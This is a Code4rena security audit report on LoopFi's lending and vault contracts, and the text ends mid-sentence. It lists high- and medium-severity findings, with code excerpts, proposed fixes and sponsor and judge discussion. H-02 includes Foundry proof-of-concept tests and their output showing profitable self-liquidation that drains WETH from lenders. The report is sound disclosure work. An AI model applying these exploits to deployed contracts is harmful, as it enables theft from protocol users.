Findings & Analysis Report
Table of contents
- Summary
- Scope
- Severity Criteria
- [H-01]
reward calculation does not deduct fees from reward amount, causing DoS or extra rewards lost - [H-02] Liquidation doesn’t account for penalty when calculating collateral to give, allowing users to profit by borrowing and self-liquidating
- [H-03] Zero rates on new quoted tokens allow an attacker to take an interest free quota
- [H-04]
BUT does not call the_setupRole()
function in it’s constructor to set the initial roles. This leads to a complete DOS of the important claim function rendering the contract unable to claim rewards - [H-05] There is a calculation error in
- [H-06] Malicious borrower can evade full liquidation in
by repaying small amounts of debt - [H-07] Malicious borrower cycle exploits to inflate interest rates
- [H-08]
bug inMultiFeeDistribution.sol
causes new incentives to erase previous incentives - [H-09]
uses incorrect position address when withdrawing - [H-10] Debt position interest is compounded while pool interest is simple causing inconsistency between
- [H-11] It is nearly impossble for Liquidators to use
to fully pay off a non bad-debt position - [H-12]
should not set profit= 0
when callingpool.repayCreditAccount()
- [H-13]
should usemintProfit()
to mint fees, as the current implementation may lead to locked up WETH in PoolV3 - [H-14] An infinite loop in
withdraw - [H-15] Directly sending dust token amount will slow down distribution in
- [H-01]
- [M-01] Bringing a position from unsafe to safe by liquidation partially
- [M-02] Wrong repayment amount used in
, forcing users to unexpectedly lose funds - [M-03]
will return wrong swap token for balancerEXACT_OUT
swaps - [M-04]
can not be up to a year as intended because it is hardcoded to1749120350
- [M-05]
will always revert - [M-06]
wrongly updatesassetsIn
array, leading toPositionAction4626::_onIncreaseLever
to always revert - [M-07]
wrongly updatestokenOut
forcing user’s funds to be stuck in the position action contract - [M-08]
returns wrong token out amount - [M-09]
uses Chainlink’s deprecatedansweredInRound
- [M-10] Malicious actor can abuse the minimum shares check in
and cause DoS or locked funds for the last user that withdraws - [M-11]
does not scaletakeCollateral
; therefore, it might send the wrong amount of collateral to the liquidator whentokenScale ! = 1 ether
- [M-12] Unclaimed rewards handling issue in
contract functions (AuraVault::deposit
) - [M-13] Lack of Slippage Control in
Functions Can Lead to Unexpected Financial Losses for Users - [M-14] DOS attack to
when using an ERC20 permittransferFrom
- [M-15]
modifier in the CDPVault can be bypassed by users - [M-16] Incorrect calculation of
in functioncalcDecrease
- [M-17]
fails to consider the loan fee in Flashlender when calculatingloanAmount
, as a result, the functionality will not work whenprotocolFee != 0
- [M-18] In
, the calculation ofloss
is incorrect - [M-19] Because of the asset:
Share 1:1 Conversion
, if vault incurs a loss, the last user to withdraw will take the entire loss - [M-20] Honest users could be permanently DOS’d from withdrawing their vested tokens/rewards
- [M-21] In
is implemented incorrectly - [M-22] Users of a vault can steal other user’s rewards when one vault’s
differs from another vault’slastRewardTime
- [M-23] The debt in
needs to be converted into USD; otherwise, it is not a correct value comparison - [M-24]
could be set to0
accidentally - [M-25] Incorrect address is used as
for ERC20 permit signature verification - [M-26]
use incorrect share converting function to calculate profit and loss - [M-27] Rewards may be spread out among the wrong time period due to the way the protocol calculates it
- [M-28]
can return a stale price - [M-29] Bug in
allows users who are disqualified to claim their previously earned emissions - [M-30] Usage of
can cause user to miss out on rewards onmanualStopEmissionsFor
invocation - [M-31] Discrepancy between the
and thelastAllPoolUpdate
can allow for incorrect reward distribution to pools ifregisterRewardDeposit
deposits less assets - [M-32] Emission schedule is not followed and can cause unexpected allocation of rewards
- [M-33]
may have leftover tokens after conductingleverParams.auxSwap
- [M-34]
incorrectly checksauxSwap.assetIn
should be equal tocollateralParams.targetToken
- [M-35]
should withdraw fromposition
CDPVault position instead ofaddress(this)
- [M-36] ChefIncentivesController caches
, which is not required, and may cause issues during reward update - [M-37]
does not support native ETH as input token - [M-38]
also returns token amount in wrong scale - [M-39] Lack of slippage check while interacting with ERC4626 Vault in
could lead to users’ fund loss
Low Risk and Non-Critical Issues
- Disclaimer
- Table of Contents for Low/NC
- 01
would be broken when protocol heavily scales - 02 Make
and liquidations available in the same scenario - 03 Consider allowing price updates within the wait window if the price has moved beyond a certain threshold
- 04 Consider having a safety buffer applied to liquidations
- 05 Potential mis-pricing when a token gets removed/deregistered from a Balancer pool
- 06 Users can sidestep the
in an edge case - 07 Consider not relying on an infrequently updated oracle for AURA spot pricing
- 08 Fallback oracles should be implemented in the
- 09 Configuration changes could drastically affect users and should be behind a timelock
- 10 Using spot prices directly for liquidations might be unfair for users and leaves them at risk
- 11 Ensure the use of a shorter stale period in production
- 12 Rewards could be emitted to some contracts unintentionally
- 13 Consider making
as a whole backed by pausable modifiers - 14 Liquidations could be frontrun
- 15 Consider making withdrawal of assets via
a one step process whencooldownDuration
is set to 0 - 16 Users can be liquidated in the next block
- 17 Restrict calling
on the underlying token - 18 Consider relaxing the hardcoded slippage for auto compounding
- 19 Consider not having Chainlink’s oracle address as an immutable var
- 20 Setters should always have equality checkers
- 21 Erroneous reward tokens should not be added
- 22 Fix typos
- 23 Follow chainlink best practices and use proxy instead of price aggregator directly
- 24 Incorrect storage gap sizes are not advised
- 25 Import declarations should import specific identifiers, rather than the whole file
- Table of Contents for WatchPug’s
Findings - NC-01 CC
from the WatchPug first report - NC-02 CC
from the WatchPug first report - NC-03 CC
from the WatchPug first report - NC-04 CC
from the WatchPug second report - NC-05 CC
from the WatchPug second report - NC-06 CC
Re: WP-C2
from the WatchPug third report - NC-07 CC
from the WatchPug fourth report - NC-08 CC
from the WatchPug fifth report - NC-09 CC
from the WatchPug fifth report
- Disclosures
About C4
Code4rena (C4) is an open organization consisting of security researchers, auditors, developers, and individuals with domain expertise in smart contracts.
A C4 audit is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.
During the audit outlined in this document, C4 conducted an analysis of the LoopFi smart contract system written in Solidity. The audit took place between July 25 — August 15, 2024.
94 Wardens contributed reports to LoopFi:
- pkqs90
- novamanbg
- Evo
- Bauchibred
- hash
- 0xAlix2 (a_kalout and ali_shehab)
- rscodes
- lian886
- nnez
- 0xpiken
- Rhaydden
- crypticdefense
- Agontuk
- hearmen
- 0x40saoirse
- Kaysoft
- 0xbepresent
- mrMorningstar
- Spearmint
- Centaur (Mylifechangefast_eth, Aristos and TheWeb3Mechanic)
- Afriauditor
- monrel
- zhaojohnson
- 0xc0ffEE
- lanrebayode77
- NexusAudits (cheatc0d3 and Zanna)
- minglei-wang-3570
- 4B
- Bigsam
- Chinmay
- chaduke
- 0xhacksmithh
- Sparrow
- zzebra83
- lightoasis
- jigster
- AKA8u9K111er
- Infect3d
- karsar
- 0xBugSlayer
- zhaojie
- inh3l
- EPSec (petarP1998 and 1337web3)
- seaona
- VAD37
- Trooper
- web3km
- joaovwfreire
- Nyx
- grearlake
- Ruhum
- boraichodrunkenmaster
- pks_
- emerald7017
- thisvishalsingh
- petarP1998
- Anirruth
- 13u9
- gumgumzum
- peanuts
- yashar
- josephxander
- ElCid
- Inspecktor
- ak1
- zxriptor
- JanuaryPersimmon2024
- ustas
- emmac002
- 0xAadi
- asui
- Eeyore
- 0xMax1mus
- Walter
- Breeje
- unRekt (tdey and Gululu)
- atoko
- 0xjoaovpsantos
- jolah1
- Sungyu
- y0ng0p3
- 0xspryon
- 0XRolko
- Damola0x
- BiasedMerc
- K42
- jo13
This audit was judged by Koolex.
Final report assembled by thebrittfactor.
The C4 analysis yielded an aggregated total of 54 unique vulnerabilities. Of these vulnerabilities, 15 received a risk rating in the category of HIGH severity and 39 received a risk rating in the category of MEDIUM severity.
Additionally, C4 analysis included 23 reports detailing issues with a risk rating of LOW severity or non-critical.
All of the issues presented here are linked back to their original finding.
The code under review can be found within the C4 LoopFi repository, and is composed of 26 smart contracts written in the Solidity programming language and includes 4562 lines of Solidity code.
Severity Criteria
C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.
High-level considerations for vulnerabilities span the following key areas when conducting assessments:
- Malicious Input Handling
- Escalation of privileges
- Arithmetic
- Gas use
For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.
High Risk Findings (15)
[H-01] AuraVault::claim
reward calculation does not deduct fees from reward amount, causing DoS or extra rewards lost
Submitted by crypticdefense, also found by Agontuk and mrMorningstar
allows users to claim rewards corresponding to the amount of WETH
they are depositing in the same call.
Prior to sending rewards to msg.sender
, a percentage of the rewards is sent to the vault locker rewards
. However, the percentage of the rewards sent to the vault locker rewards
is not deducted from the amount that is sent to the caller. The entire reward amount
is sent to msg.sender
This is problematic, as it creates two possible scenarios:
- Contract attempts to send more reward tokens than it holds, causing DoS.
- Contract successfully sends extra reward tokens, essentially stealing rewards from others.
Therefore, the impact ranges from stolen funds
to Denial of Service
Proof of Concept
As users interact with the AuraVault
contract, the contract will accumulate rewards through interaction with an external rewards contract, which acts as an ERC-4626 vault.
Users can deposit, withdraw, redeem, and claim rewards:
* @notice Allows anyone to claim accumulated rewards by depositing WETH instead
* @param amounts An array of reward amounts to be claimed ordered as [rewardToken, secondaryRewardToken]
* @param maxAmountIn The max amount of WETH to be sent to the Vault
function claim(uint256[] memory amounts, uint256 maxAmountIn) external returns (uint256 amountIn) {
// Claim rewards from Aura reward pool
// Compute assets amount to be sent to the Vault
VaultConfig memory _config = vaultConfig;
amountIn = _previewReward(amounts[0], amounts[1], _config);
// Transfer assets to Vault
require(amountIn <= maxAmountIn, "!Slippage");
IERC20(asset()).safeTransferFrom(msg.sender, address(this), amountIn);
// Compound assets into "asset" balance
IERC20(asset()).safeApprove(rewardPool, amountIn);
IPool(rewardPool).deposit(amountIn, address(this));
// Distribute BAL rewards
@> IERC20(BAL).safeTransfer(_config.lockerRewards, (amounts[0] * _config.lockerIncentive) / INCENTIVE_BASIS);
@> IERC20(BAL).safeTransfer(msg.sender, amounts[0]);
// Distribute AURA rewards
if (block.timestamp <= INFLATION_PROTECTION_TIME) {
@> IERC20(AURA).safeTransfer(_config.lockerRewards, (amounts[1] * _config.lockerIncentive) / INCENTIVE_BASIS);
@> IERC20(AURA).safeTransfer(msg.sender, amounts[1]);
} else {
IERC20(AURA).safeTransfer(_config.lockerRewards, IERC20(AURA).balanceOf(address(this)));
emit Claimed(msg.sender, amounts[0], amounts[1], amountIn);
Firstly, rewards are claimed from the Aura reward pool
, proceeded by a call to _previewReward()
to calculate the amount of WETH
the caller must deposit to receive the amount of rewards they have specified.
The issue is with the transferring of rewards. We can see the vault locker rewards
receives a percentage of the rewards, calculated by (amounts[0] * _config.lockerIncentive) / INCENTIVE_BASIS)
However, the entire amount of rewards is still sent to the caller, without accounting for the percentage that was just sent to the vault locker rewards
. Therefore, this call is sending extra rewards to the caller.
As mentioned, this leads to two scenarios:
- DoS due to insufficient rewards.
- Extra rewards successfully sent to the caller, essentially stealing rewards from others.
Consider the following scenario:
- Alice decides to deposit
and claimBAL
rewards via a call toAuraVault::claim
is set to 1000 andINCENTIVE_BASIS
is set to 10000, effectively setting the fee portion to 10%. - Alice sets
amounts[0] = 100e18 BAL
andamount[1] = 100e18 AURA
. IPool(rewardPool).getReward();
is called, setting the rewards held in theAuraVault
contract to100e18 BAL
and100e18 AURA
.IERC20(BAL).safeTransfer(_config.lockerRewards, (amounts[0] * _config.lockerIncentive) / INCENTIVE_BASIS);
call sends100e18 * 1000 / 10000 = 10e18
tokens to_config.lockerRewards
, which is thevault locker rewards
.- The
contract now holds90e18 BAL
and100e18 AURA
. IERC20(BAL).safeTransfer(msg.sender, amounts[0]);
attempts to send100e18 BAL
; however,10e18
was already sent tolocker rewards
, so this call will DoS due to insufficient funds.
The call will revert in the case described above, and Alice would have to specify a lower amount of rewards (i.e., 50e18 BAL and AURA), but we can see that the contract will still send more rewards than intended, effectively stealing rewards from others.
Tools Used
Recommended Mitigation Steps
Ensure the amount sent to the locker is deducted from the amount sent to the caller:
* @notice Allows anyone to claim accumulated rewards by depositing WETH instead
* @param amounts An array of reward amounts to be claimed ordered as [rewardToken, secondaryRewardToken]
* @param maxAmountIn The max amount of WETH to be sent to the Vault
function claim(uint256[] memory amounts, uint256 maxAmountIn) external returns (uint256 amountIn) {
// Claim rewards from Aura reward pool
// Compute assets amount to be sent to the Vault
VaultConfig memory _config = vaultConfig;
amountIn = _previewReward(amounts[0], amounts[1], _config);
// Transfer assets to Vault
require(amountIn <= maxAmountIn, "!Slippage");
IERC20(asset()).safeTransferFrom(msg.sender, address(this), amountIn);
// Compound assets into "asset" balance
IERC20(asset()).safeApprove(rewardPool, amountIn);
IPool(rewardPool).deposit(amountIn, address(this));
// Distribute BAL rewards
+ uint256 fee = (amounts[0] * _config.lockerIncentive) / INCENTIVE_BASIS;
+ uint256 amount = amounts[0] - fee;
- IERC20(BAL).safeTransfer(_config.lockerRewards, (amounts[0] * _config.lockerIncentive) / INCENTIVE_BASIS);
- IERC20(BAL).safeTransfer(msg.sender, amounts[0]);
+ IERC20(BAL).safeTransfer(_config.lockerRewards, fee);
+ IERC20(BAL).safeTransfer(msg.sender, amount);
// Distribute AURA rewards
if (block.timestamp <= INFLATION_PROTECTION_TIME) {
+ fee = (amounts[1] * _config.lockerIncentive) / INCENTIVE_BASIS;
+ amount = amounts[1] - fee;
- IERC20(AURA).safeTransfer(_config.lockerRewards, (amounts[1] * _config.lockerIncentive) / INCENTIVE_BASIS);
- IERC20(AURA).safeTransfer(msg.sender, amounts[1]);
+ IERC20(BAL).safeTransfer(_config.lockerRewards, fee);
+ IERC20(BAL).safeTransfer(msg.sender, amount);
} else {
IERC20(AURA).safeTransfer(_config.lockerRewards, IERC20(AURA).balanceOf(address(this)));
emit Claimed(msg.sender, amounts[0], amounts[1], amountIn);
Assessed type
amarcu (LoopFi) acknowledged and commented via duplicate issue #206:
Acknowledged but we will remove and not use the
[H-02] Liquidation doesn’t account for penalty when calculating collateral to give, allowing users to profit by borrowing and self-liquidating
Submitted by crypticdefense, also found by 0xhacksmithh, mrMorningstar, Bigsam, Chinmay, and pkqs90
allows users to borrow underlying
from PoolV3
by depositing collateral into the vault, such that the (collateral value of their position / liquidationRatio) >= their current total debt
Users must repay their debt fully via CDPVault::repay
, and the amount must cover their entire current total debt
, which also includes various interest factors. If the value of their collateral divided by liquidationRatio
is less than the debt of their position, then their position is considered unsafe
and anyone can liquidate
the position by buying the collateral at a discount
. The amount spent by the caller is used to cover for the debt.
To ensure that users cannot profit from self liquidations, the liquidatePosition
function incorporates a penalty mechanism, that is intended to deduct fees from the payment amount, which subsequently goes to the protocol as profit.
The problem is that when the liquidatePosition
function calculates the collateral to give to the caller, it utilizes the the repay amount without the penalty, essentially functioning as if there is no penalty mechanism at all. The caller can specify any repay amount
, and the collateral they receive will correspond directly to repay amount / discount
, with no penalty.
This allows malicious users to profit by deposit collateral -> borrow WETH -> have their position become unsafe -> buy collateral with WETH at a discount
. Malicious users can profit and steal funds from lenders and the protocol.
The natspec for the
states that “From that repay amount a penalty (liquidationPenalty
) is subtracted to mitigate against profitable self liquidations.”
However, we will see in the PoC how this has no impact against profitable self liquidations
Proof of Concept
The following block is executed when users repay their debt:
} else if (deltaDebt < 0) {
@> uint256 maxRepayment = calcTotalDebt(debtData);
uint256 amount = abs(deltaDebt);
if (amount >= maxRepayment) {
amount = maxRepayment; // U:[CM-11]
deltaDebt = -toInt256(maxRepayment);
poolUnderlying.safeTransferFrom(creditor, address(pool), amount);
uint128 newCumulativeQuotaInterest;
if (amount == maxRepayment) {
newDebt = 0;
newCumulativeIndex = debtData.cumulativeIndexNow;
profit = debtData.accruedInterest;
newCumulativeQuotaInterest = 0;
} else {
(newDebt, newCumulativeIndex, profit, newCumulativeQuotaInterest) = calcDecrease(
amount, // delta debt
debtData.cumulativeIndexNow, // current cumulative base interest index in Ray
For users to completely repay their loan, they must pay maxRepayment
amount, which is calculated via a call to calcTotalDebt
If the position is unsafe (collateral value / liquidation ratio < total debt
), then anyone can liquidate it for a discount:
// load price and calculate discounted price
uint256 spotPrice_ = spotPrice();
@> uint256 discountedPrice = wmul(spotPrice_, liqConfig_.liquidationDiscount);
if (spotPrice_ == 0) revert CDPVault__liquidatePosition_invalidSpotPrice();
// Ensure that there's no bad debt
if (calcTotalDebt(debtData) > wmul(position.collateral, spotPrice_)) revert CDPVault__BadDebt();
// compute collateral to take, debt to repay and penalty to pay
@> uint256 takeCollateral = wdiv(repayAmount, discountedPrice);
uint256 deltaDebt = wmul(repayAmount, liqConfig_.liquidationPenalty);
uint256 penalty = wmul(repayAmount, WAD - liqConfig_.liquidationPenalty);
There is also a penalty that the liquidator must pay (deducted from repayAmount
). This is to mitigate profits from self-liquidation, as stated by the natspec of this function:
/// ... From that repay amount a penalty (`liquidationPenalty`) is subtracted to mitigate against
/// profitable self liquidations ...
So the actual amount of debt repaid by the liquidator is repayAmount - penalty
// transfer the repay amount from the liquidator to the vault
poolUnderlying.safeTransferFrom(msg.sender, address(pool), repayAmount - penalty);
In the same call, the penalty
is also transferred to the pool, taken as a profit for the protocol.
// Mint the penalty from the vault to the treasury
poolUnderlying.safeTransferFrom(msg.sender, address(pool), penalty);
However, there is a critical problem here. We can see that the intention here is that the caller pays repayAmount - penalty
for the debt, and that the penalty goes towards profit.
This can be confirmed by observing the amount of debt that is covered via repayment:
uint256 deltaDebt = wmul(repayAmount, liqConfig_.liquidationPenalty);
Note that repayAmount * liqConfig_.liquidationPenalty
is equivalent to repayAmount - penalty
. So the debt reduced is repayAmount - penalty
. The problem is that the collateral sent to the caller does not incorporate the penalty for liquidation.
Essentially, this makes the penalty
redundant, because the caller still receives the full repayAmount
of collateral specified, including a discount
A malicious user can perform the following attack scenario:
- Deposit collateral via
. - Borrow WETH via
. - Have their position become unsafe (i.e., wait until enough debt interest is accrued such that
(collateral value of their position / liquidationRatio) < their current total debt
). - Fully buy back collateral at a discount.
Coded PoC
Note: The value of the discount and penalty were chosen by observing the values currently set in scripts/config.js
, they were not chosen arbitrarily.
Add the following to test/unit/CDPVault.t.sol
and run forge test --mt testSelfLiquidateProfit -vv
function testSelfLiquidateProfit() public {
mockWETH.mint(address(this), 20e18);
// discount = 0.98 ether (0.02% discount)
// penalty = 0.99 ether (0.01% penalty)
CDPVault vault = createCDPVault(token, 150 ether, 0, 1.25 ether, 0.99 ether, 0.98 ether);
// create position
uint256 wethBefore = mockWETH.balanceOf(address(this));
_modifyCollateralAndDebt(vault, 100 ether, 80 ether);
uint256 wethBorrowed = mockWETH.balanceOf(address(this)) - wethBefore;
uint256 collateralDeposited = 100 ether;
console.log("weth borrowed: ", wethBorrowed);
console.log("collateral deposited: ", collateralDeposited);
address position = address(this);
uint256 amountUserMustRepay = vault.virtualDebt(position);
console.log("Amount of debt user must repay: ", amountUserMustRepay);
// any attempt to liquidate now will revert because position is safe
vault.liquidatePosition(position, 1 ether);
// user waits some time for price to change so position becomes unsafe (but no bad debt yet)
// in reality, interest will accrue, however to make this PoC simple we will update spot price (which is another way user can take advantage)
_updateSpot(0.80 ether);
(uint256 collateral, uint256 debt , , , , ) = vault.positions(position);
// calculate amount to repay to fully liquidate position.
uint256 spotAmt = oracle.spot(address(token));
uint256 discountPercent = 0.98 ether;
uint256 discountAmount = wmul(spotAmt, discountPercent);
uint256 repayFull = wmul(collateral, discountAmount);
console.log("Amount user is repaying: ", repayFull);
mockWETH.approve(address(vault), repayFull);
// fully liquidate position
wethBefore = mockWETH.balanceOf(address(this));
uint collateralBefore = token.balanceOf(address(this));
vault.liquidatePosition(position, repayFull);
uint256 wethSpent = wethBefore - mockWETH.balanceOf(address(this));
uint256 collateralReceived = token.balanceOf(address(this)) - collateralBefore;
console.log("weth spent: ", wethSpent);
console.log("collateral received: ", collateralReceived);
console.log("Total WETH earned: ", wethBorrowed - wethSpent);
console.log("collateral lost: ", collateralDeposited - collateralReceived);
// confirm that collateral in position is 0
(collateral, debt, , , , ) = vault.positions(position);
console.log("collateral remaining in position: ", collateral);
[PASS] testSelfLiquidateProfit() (gas: 3761322)
weth borrowed: 80000000000000000000
collateral deposited: 100000000000000000000
Amount of debt user must repay: 80000000000000000000
Amount user is repaying: 78400000000000000000
weth spent: 78400000000000000000
collateral received: 100000000000000000000
Total WETH earned: 1600000000000000000
collateral lost: 0
collateral remaining in position: 0
Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 5.46ms
Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)
As displayed in the coded PoC, since the user receives the full amount of collateral without the penalty applied to the amount they receive, the user profits 1.6e18 WETH with the attack scenario described above.
Tools Used
Recommended Mitigation Steps
Apply the penalty to repayAmount
when calculating the amount of collateral to give to the caller. In addition, ensure that the protocol applies a high enough penalty such that self-liquidators cannot profit from this attack.
function liquidatePosition(address owner, uint256 repayAmount) external whenNotPaused {
// validate params
if (owner == address(0) || repayAmount == 0) revert CDPVault__liquidatePosition_invalidParameters();
// load configs
VaultConfig memory config = vaultConfig;
LiquidationConfig memory liqConfig_ = liquidationConfig;
// load liquidated position
Position memory position = positions[owner];
DebtData memory debtData = _calcDebt(position);
// load price and calculate discounted price
uint256 spotPrice_ = spotPrice();
uint256 discountedPrice = wmul(spotPrice_, liqConfig_.liquidationDiscount);
if (spotPrice_ == 0) revert CDPVault__liquidatePosition_invalidSpotPrice();
// Ensure that there's no bad debt
if (calcTotalDebt(debtData) > wmul(position.collateral, spotPrice_)) revert CDPVault__BadDebt();
// compute collateral to take, debt to repay and penalty to pay
- uint256 takeCollateral = wdiv(repayAmount, discountedPrice);
uint256 deltaDebt = wmul(repayAmount, liqConfig_.liquidationPenalty);
uint256 penalty = wmul(repayAmount, WAD - liqConfig_.liquidationPenalty);
+ uint256 takeCollateral = wdiv(repayAmount - penalty, discountedPrice);
if (takeCollateral > position.collateral) revert CDPVault__tooHighRepayAmount();
// verify that the position is indeed unsafe
if (_isCollateralized(calcTotalDebt(debtData), wmul(position.collateral, spotPrice_), config.liquidationRatio))
revert CDPVault__liquidatePosition_notUnsafe();
// transfer the repay amount from the liquidator to the vault
poolUnderlying.safeTransferFrom(msg.sender, address(pool), repayAmount - penalty);
uint256 newDebt;
uint256 profit;
uint256 maxRepayment = calcTotalDebt(debtData);
uint256 newCumulativeIndex;
if (deltaDebt == maxRepayment) {
newDebt = 0;
newCumulativeIndex = debtData.cumulativeIndexNow;
profit = debtData.accruedInterest;
position.cumulativeQuotaInterest = 0;
} else {
(newDebt, newCumulativeIndex, profit, position.cumulativeQuotaInterest) = calcDecrease(
deltaDebt, // delta debt
debtData.cumulativeIndexNow, // current cumulative base interest index in Ray
position.cumulativeQuotaIndexLU = debtData.cumulativeQuotaIndexNow;
// update liquidated position
position = _modifyPosition(owner, position, newDebt, newCumulativeIndex, -toInt256(takeCollateral), totalDebt);
pool.repayCreditAccount(debtData.debt - newDebt, profit, 0); // U:[CM-11]
// transfer the collateral amount from the vault to the liquidator
token.safeTransfer(msg.sender, takeCollateral);
// Mint the penalty from the vault to the treasury
poolUnderlying.safeTransferFrom(msg.sender, address(pool), penalty);
if (debtData.debt - newDebt != 0) {
IPoolV3(pool).updateQuotaRevenue(_calcQuotaRevenueChange(-int(debtData.debt - newDebt))); // U:[PQK-15]
Assessed type
0xtj24 (LoopFi) disputed via duplicate issue #58:
The penalty is taken from the liquidator here.
crypticdefense (warden) commented:
@Koolex - This finding is how liquidators must pay
to the protocol with apenalty
to prevent profitable self-liquidations.repayAmount - penalty
is used to cover the debt payment, andpenalty
is given to the protocol for profit. SincerepayAmount-penalty
is used to cover the debt, the caller should only getrepayAmount-penalty
worth of collateral. However, the caller receives the fullrepayAmount
value of collateral including the penalty, as if the penalty added towards the debt. This defeats the purpose of the penalty and allows a critical vulnerability where an attacker can borrow and self liquidate at a discount, thus stealing funds from lenders/protocol, as described in the coded PoC.
@crypticdefense - Could you please adjust the PoC to show the same impact when interested accrued?
// user waits some time for price to change so position becomes unsafe (but no bad debt yet) // in reality, interest will accrue, however to make this PoC simple we will update spot price (which is another way user can take advantage)
This will help to assess the severity.
crypticdefense (warden) commented:
@Koolex, here is the adjusted PoC that shows the same impact when interest is accrued.
Add the following to
and run forgetest --mt testSelfLiquidateProfit -vv
:function testSelfLiquidateProfit() public { mockWETH.mint(address(this), 20e18); // discount = 0.92 ether (8% discount) // penalty = 0.99 ether (0.01% penalty) // liquidation ratio = 1.05 ether (105%) CDPVault vault = createCDPVault(token, 150 ether, 0, 1.05 ether, 0.99 ether, 0.92 ether); createGaugeAndSetGauge(address(vault)); // create position uint256 wethBefore = mockWETH.balanceOf(address(this)); _modifyCollateralAndDebt(vault, 100 ether, 95 ether); uint256 wethBorrowed = mockWETH.balanceOf(address(this)) - wethBefore; uint256 collateralDeposited = 100 ether; console.log("weth borrowed: ", wethBorrowed); console.log("collateral deposited: ", collateralDeposited); address position = address(this); uint256 amountUserMustRepay = vault.virtualDebt(position); console.log("Amount of debt user must repay: ", amountUserMustRepay); // any attempt to liquidate now will revert because position is safe vm.expectRevert(bytes4(keccak256("CDPVault__liquidatePosition_notUnsafe()"))); vault.liquidatePosition(position, 1 ether); // 30 days have now passed, with interest accrued vm.warp(block.timestamp + 30 days); // new amount user must repay due to debt accrued amountUserMustRepay = vault.virtualDebt(position); console.log("Amount of debt user must repay after 30 days of interest accrued: ", amountUserMustRepay); (uint256 collateral, uint256 debt , , , , ) = vault.positions(position); // calculate amount to repay to fully liquidate position. uint256 collateralSpotPrice = oracle.spot(address(token)); uint256 discountPercent = 0.92 ether; uint256 discountAmount = wmul(collateralSpotPrice, discountPercent); uint256 repayFull = wmul(collateral, discountAmount); console.log("Amount user is repaying: ", repayFull); mockWETH.approve(address(vault), repayFull); // fully liquidate position wethBefore = mockWETH.balanceOf(address(this)); uint collateralBefore = token.balanceOf(address(this)); vault.liquidatePosition(position, uint256(repayFull)); uint256 wethSpent = wethBefore - mockWETH.balanceOf(address(this)); uint256 collateralReceived = token.balanceOf(address(this)) - collateralBefore; console.log("weth spent: ", wethSpent); console.log("collateral received: ", collateralReceived); console.log("Total WETH earned: ", wethBorrowed - wethSpent); console.log("collateral lost: ", collateralDeposited - collateralReceived); // confirm that collateral in position is 0 (collateral, debt, , , , ) = vault.positions(position); console.log("collateral remaining in position: ", collateral); }
Ran 1 test for src/test/unit/CDPVault.t.sol:CDPVaultTest [PASS] testSelfLiquidateProfit() (gas: 3775443) Logs: weth borrowed: 95000000000000000000 collateral deposited: 100000000000000000000 Amount of debt user must repay: 95000000000000000000 Amount of debt user must repay after 30 days of interest accrued: 95788804673650282029 Amount user is repaying: 92000000000000000000 weth spent: 92000000000000000000 collateral received: 100000000000000000000 Total WETH earned: 3000000000000000000 collateral lost: 0 collateral remaining in position: 0 Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.38ms (1.44ms CPU time) Ran 1 test suite in 11.36ms (4.38ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)
After 30 days of interest accrued, attacker self-liquidates and receives the full amount of collateral without the penalty applied to the amount they receive, while profiting
WETH. This wouldn’t be profitable if the penalty was applied to the value of the collateral to give to the liquidator.Edit: Fixed a mistake that was noted in my first response.
Given the impact demonstrated above, this stays as High.
[H-03] Zero rates on new quoted tokens allow an attacker to take an interest free quota
Submitted by Bauchibred
Take a look here:
function addQuotaToken(address token) external override gaugeOnly {
if (quotaTokensSet.contains(token)) {
revert TokenAlreadyAddedException();
quotaTokensSet.add(token); //@audit rates here are `0` by default.
totalQuotaParams[token].cumulativeIndexLU = 1;
emit AddQuotaToken(token);
This function is used to add a new token, when the token is added the rates are set to 0
by default up until a general epoch update before the real rate gets set for the token here.
function _checkAndUpdateEpoch() internal {
uint16 epochNow = IGearStakingV3(voter).getCurrentEpoch(); // U:[GA-14]
if (epochNow > epochLastUpdate) {
epochLastUpdate = epochNow; // U:[GA-14]
if (!epochFrozen) {
// The quota keeper should call back to retrieve quota rates for needed tokens
_poolQuotaKeeper().updateRates(); //@audit
emit UpdateEpoch(epochNow); // U:[GA-14]
Which calls this:
function updateRates()
gaugeOnly // U:[PQK-3]
address[] memory tokens = quotaTokensSet.values();
uint16[] memory rates = IGaugeV3(gauge).getRates(tokens); // U:[PQK-7]
uint256 quotaRevenue; // U:[PQK-7]
uint256 timestampLU = lastQuotaRateUpdate;
uint256 len = tokens.length;
for (uint256 i; i < len; ) {
address token = tokens[i];
uint16 rate = rates[i];
TokenQuotaParams storage tokenQuotaParams = totalQuotaParams[token]; // U:[PQK-7]
(uint16 prevRate, uint192 tqCumulativeIndexLU, ) = _getTokenQuotaParamsOrRevert(
tokenQuotaParams.cumulativeIndexLU = QuotasLogic.cumulativeIndexSince(
); // U:[PQK-7]
tokenQuotaParams.rate = rate; // U:[PQK-7]
quotaRevenue +=
(IPoolV3(pool).creditManagerBorrowed(creditManagers[token]) * rate) /
emit UpdateTokenQuotaRate(token, rate); // U:[PQK-7]
unchecked {
IPoolV3(pool).setQuotaRevenue(quotaRevenue); // U:[PQK-7]
lastQuotaRateUpdate = uint40(block.timestamp); // U:[PQK-7]
However, the problem is the fact that once this new token is added, and the rate is 0
, an attacker can request a huge quota even up to the configured limit without having to pay any interest to the protocol all through the period where rate = 0
A malicious user can request a very high quota and not pay any interest all through the period when the rate is defaulted to 0
Recommended Mitigation Steps
Consider atomically updating the rates in the instance where a new quoted token is added.
Assessed type
Koolex (judge) decreased severity to Medium and commented:
an attacker can request a huge quota even up to the configured limit without having to pay any interest to the protocol.
Requesting from the Warden to elaborate on this, only in PJQA please.
Bauchibred (warden) commented:
@Koolex, what that snippet means is the malicious user can take a completely risk free position while exposing the system since the rate is defaulted to 0; i.e., they can just request a very high quota, which in this case would be the configured maximum for said asset thats’s to be used to limit protocol’s exposure. So in this case they do not pay any interest all throughout this period when these rates are
, which is why I submitted this asHigh
.To go into a bit more details on the whole context of the quota logic:
In the current implementation, quotas are used to limit the system’s exposure to some assets, so having zero rates is a direct loss on the protocol since no interest accrues over time with these rates and as such
